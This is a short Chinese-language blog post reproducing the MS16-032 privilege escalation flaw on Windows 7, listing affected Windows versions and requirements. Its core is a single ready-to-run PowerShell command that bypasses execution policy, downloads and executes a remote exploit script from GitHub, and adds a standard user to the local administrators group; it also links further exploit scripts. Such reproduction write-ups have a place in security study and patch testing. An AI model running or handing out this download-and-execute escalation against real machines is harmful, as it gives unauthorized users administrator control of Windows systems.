exploit-db的详情: https://www.exploit-db.com/exploits/39574/
注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行
此漏洞会影响以下Microsoft产品:
Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server
复现测试的版本是Windows 7,其他的没有测试,可以自行进行测试;漏洞测试0x01使用标准用户登陆win7,下图是当前登录用户px的详细信息
0x02在powershell里面,直接执行命令进行提权,简单粗暴
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators px /add'"
0x03下面就是见证奇迹的时刻了
漏洞利用成功,有好几种方式,这只是其中一种。下面也是一种权限提升的方式,简单写一下脚本的下载下载地址:https://www.exploit-db.com/exploits/39719/
转载请注明:Adminxe's Blog » MS16-032 提权 漏洞复现